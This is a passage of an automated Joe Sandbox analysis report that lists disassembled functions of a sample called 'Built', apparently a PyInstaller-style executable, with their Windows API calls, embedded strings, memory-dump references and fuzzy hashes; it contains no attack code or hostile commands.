Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
Instruction Fuzzy Hash: 8A115B20E2C642C2FA647725566157AE2425F587A0F844334DC3E47EDBFE2CB4018739

Function 00007FF76D5C2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF76D5C2338
DialogBoxIndirectParamW.USER32 ref: 00007FF76D5C23FE
DeleteObject.GDI32 ref: 00007FF76D5C2431
DestroyIcon.USER32 ref: 00007FF76D5C2443

Strings

Unhandled exception in script, xrefs: 00007FF76D5C2368

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction ID: 609efc2a4745c317c5030dfd28b771cd4af625adbb1b43f507c9b1ac438cc0d9
Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction Fuzzy Hash: 50313F7262D682C5EB20BB61E8552E9B360FB89784F840135EE4D47F56EF3CD1058724

Function 00007FF76D5C2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

MessageBoxW.USER32 ref: 00007FF76D5C283B
MessageBoxA.USER32 ref: 00007FF76D5C284F

Strings

Error/warning (ANSI fallback), xrefs: 00007FF76D5C2843
%s%s: %s, xrefs: 00007FF76D5C27EC
Error, xrefs: 00007FF76D5C282C

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction ID: 717f1ca66979865fc5c786b3c2831773d00d59b48c524b8df2ad7bfa9f92ad9f
Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction Fuzzy Hash: 3D21217263C786C1E720BB10E4517EAA364FB88784F801136EA8D13A5AEF7CD645CB64

Function 00007FF76D5D8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF76D5D8DC5
GetProcAddress.KERNEL32 ref: 00007FF76D5D8DDB
FreeLibrary.KERNEL32 ref: 00007FF76D5D8E02

Strings

mscoree.dll, xrefs: 00007FF76D5D8DBC
CorExitProcess, xrefs: 00007FF76D5D8DD4

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 6791fe7d6ae47f2166580b93635099f42453476462a87e24ff5da961499b015b
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 77F0AF61A2C742C2EB14BB24A454379A320AF897A2FD80735CD6D4A9E5EF2CD049C720

Function 00007FF76D5E8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF76D5E86A0
_set_statfp.LIBCMT ref: 00007FF76D5E86BB
_set_statfp.LIBCMT ref: 00007FF76D5E86D7
_set_statfp.LIBCMT ref: 00007FF76D5E8713

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: c537f151fe50e26751e0ceb0704c424d7e94f75f6d8fd4fdb3a1ec125b076e33
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 6011BF32E7CA13C2F6583528D45637989406FEC364FD50634ED7E06ED7AE2DA8409132

Function 00007FF76D5DA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6BF
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6DE
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA706
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA717
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA728

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
Instruction ID: e3a23c33b4fa1eb9fd91c5ef346cb7a13ea3ab6ee5d1027c0814d02c4e948de1
Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
Instruction Fuzzy Hash: A5113020E2C642C1FA547325556197AE1515FA83E0FC84334EC7E46EDBFE2CB4418B39

Function 00007FF76D5DA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF76D5DA545
FlsSetValue.KERNEL32 ref: 00007FF76D5DA564
FlsSetValue.KERNEL32 ref: 00007FF76D5DA58C
FlsSetValue.KERNEL32 ref: 00007FF76D5DA59D
FlsSetValue.KERNEL32 ref: 00007FF76D5DA5AE

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
Instruction ID: 88cfe3cb0151cc5226be51c48b3f9b27207ac513443e6026b74b00aedbaccd97
Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
Instruction Fuzzy Hash: 0F11E820A2D207C2FE68B22654719BAE2814F69370FD84734DD3E4AED7FD2CB4414A39

Function 00007FF76D5D52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D52EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D5416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D54CC

Strings

verbose, xrefs: 00007FF76D5D52C0

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: 58d4a0c45c034535798c90c5705db5d4201cef23c357bde8c4b553dc42533d2b
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: B491E032A2CA46C1F721AE25D46037DB291EB02B95FC84136DE6D46BD6FE3CE4058339

Function 00007FF76D5DEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DF1B7

Part of subcall function 00007FF76D5D6D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D6D69

Strings

UTF-16LEUNICODE, xrefs: 00007FF76D5DF155
UTF-8, xrefs: 00007FF76D5DF136
ccs, xrefs: 00007FF76D5DF0F2

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 00f3fb61398ae157db352b101cb9edf821928cd36e35494b1debe1730105adbc
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: 5881C732E2D283C5F764BF25C130278B6A0AB11749FD58035CE6A97A87FB2DE4419739

Function 00007FF76D5CC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF76D5CC993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF76D5CCA2A
RtlUnwindEx.KERNEL32 ref: 00007FF76D5CCA84

Strings

csm, xrefs: 00007FF76D5CCA11

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 077da19fe4a2d0217033103bb0f44f8a20e6de25ef0e4e5635f16acedf8bcbba
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: 5D51C432B2D642CADB14EB15E804678B791EB54B88F948139DE4D47B86FF7CE851CB20

Function 00007FF76D5CE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF76D5CE5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF76D5CE6B8

Strings

csm, xrefs: 00007FF76D5CE5F2
csm, xrefs: 00007FF76D5CE70A

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: e5620f61929949cceb766e7b98cc03726e2ecfd5afd69685a473950756f74a51
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: E8519132A2C282C6EB74AA119045268B6D0EB54B84F94513ADE5D83FD6EF7CE491CF31

Function 00007FF76D5CE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF76D5CE257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF76D5CE2A3

Strings

RCC, xrefs: 00007FF76D5CE273
MOC, xrefs: 00007FF76D5CE26B

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction ID: b46da84da2d0290710e07bead2f149b0ac091433b39eabe9268ce78014536982
Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction Fuzzy Hash: A1615D3291CB85C1D621AB15E4417AAF7A0FB85B94F444239EF9D43B96EF7CE190CB20

Function 00007FF76D5C7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF76D5C324C,?,?,00007FF76D5C3964), ref: 00007FF76D5C7642

Strings

%s%c, xrefs: 00007FF76D5C75B4
\, xrefs: 00007FF76D5C75A7
%.*s, xrefs: 00007FF76D5C75FB

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction ID: 34878bade6f2a169e299abda865b778c46e2aea461ab8f349b0c133f793c5391
Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction Fuzzy Hash: 1D31BA21B2DAC5C5EA21A715E4107E6A254EB94BE4F844235EE6D43FC6FF3CD2458B20

Function 00007FF76D5C25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

MessageBoxW.USER32 ref: 00007FF76D5C2686
MessageBoxA.USER32 ref: 00007FF76D5C269A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF76D5C268E
Error, xrefs: 00007FF76D5C2677

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 58c539b24cf601d68934e0dd18d3760c98d0f56d8f1a08c7835b8e1f7310e481
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: 63115E6263CB86C1EB20AB10E451BA9B364FB48785FD05139DE9D17A56EF3CD605CB20

Function 00007FF76D5C2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

MessageBoxW.USER32 ref: 00007FF76D5C2906
MessageBoxA.USER32 ref: 00007FF76D5C291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF76D5C290E
Warning, xrefs: 00007FF76D5C28F7

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: a1e3e820adbdf5d9d0056f378c3c9860ad9a4cc396f98fe983883545f52af3f1
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 00118E6263CB86C1EB20AB00E451BA9B364FB48784FD01139DE9C57A46EF3CD604CB20

Function 00007FF76D5DB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF76D5DB92F
WriteFile.KERNEL32 ref: 00007FF76D5DBBF7
WriteFile.KERNEL32 ref: 00007FF76D5DBC3D
GetLastError.KERNEL32 ref: 00007FF76D5DBCF3

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction ID: 51eb6e5c2796886c7b9392c636550f425dff08be3fa3c59efa90b4c89deca0fa
Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction Fuzzy Hash: C7D10672B2CA81C9E710EF65D4502AC77B2FB44798B944235CE6E57F9AEE38D006C324

Function 00007FF76D5DEC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF76D5DED8C
_get_daylight.LIBCMT ref: 00007FF76D5DED9D
_get_daylight.LIBCMT ref: 00007FF76D5DEDAE
_isindst.LIBCMT ref: 00007FF76D5DEE79

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction ID: b4c6ad06c65de72ce3e7a4578f2eede24eb7067651335016378858b5ef976543
Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction Fuzzy Hash: F5511972F18111CAEB18FF64D9A16BCE7A1EB44359F900235DD2D96EE6EF38A4018720

Function 00007FF76D5D4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF76D5D4ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF76D5D4B21
GetLastError.KERNEL32 ref: 00007FF76D5D4BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5D49C4), ref: 00007FF76D5D4BFE

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
